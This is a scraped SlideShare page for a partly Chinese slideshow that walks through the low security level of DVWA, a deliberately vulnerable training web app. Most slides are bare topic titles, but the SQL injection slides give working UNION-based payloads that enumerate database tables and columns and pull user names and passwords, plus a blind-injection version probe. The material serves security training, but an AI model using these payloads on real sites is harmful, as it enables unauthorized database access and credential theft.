Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Dvwa low level

1,636 views

Published on

Dvwa low level

Published in: Technology
  • Be the first to comment

Dvwa low level

  1. 1. DVWA - Damn Vulnerable Web Application Dvwa low level
  2. 2. 1.Brute Force
  3. 3. 2.Command Injection
  4. 4. 3.CSRF
  5. 5. 4.File Inclusion
  6. 6. 5.SQL Injection
  7. 7. SQL Injection Source
  8. 8. SQL 重組 $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; 檢測是否有錯誤 1' and 1=1# 組合後變成 "select first_name,last_name form users where user_id = '1' and 1=1#";
  9. 9. 5.SQL Injection 1' order by 1# 1' union all select 1,2# 1' union all select user(),database()# 1' union all select null,table_name from information_schema.tables# 1' union all select null,table_name from information_schema.tables where table_schema = 'dvwa'# 1' union all select null,column_name from information_schema.columns where table_schema ='dvwa'#
  10. 10. 5.SQL Injection 1' union all select user,password from users#
  11. 11. 6.Blind SQL Injection 差別
  12. 12. 6.Blind SQL Injection 我們可以先 檢測版本 1' union all select null,substring(@@version,1,1)=4#
  13. 13. 7.File Upload
  14. 14. 8.Reflected Cross Site Scripting (XSS)
  15. 15. 9.Stored Cross Site Scripting (XSS)
  16. 16. Dvwa medium level To be continue vance@hst.tw

×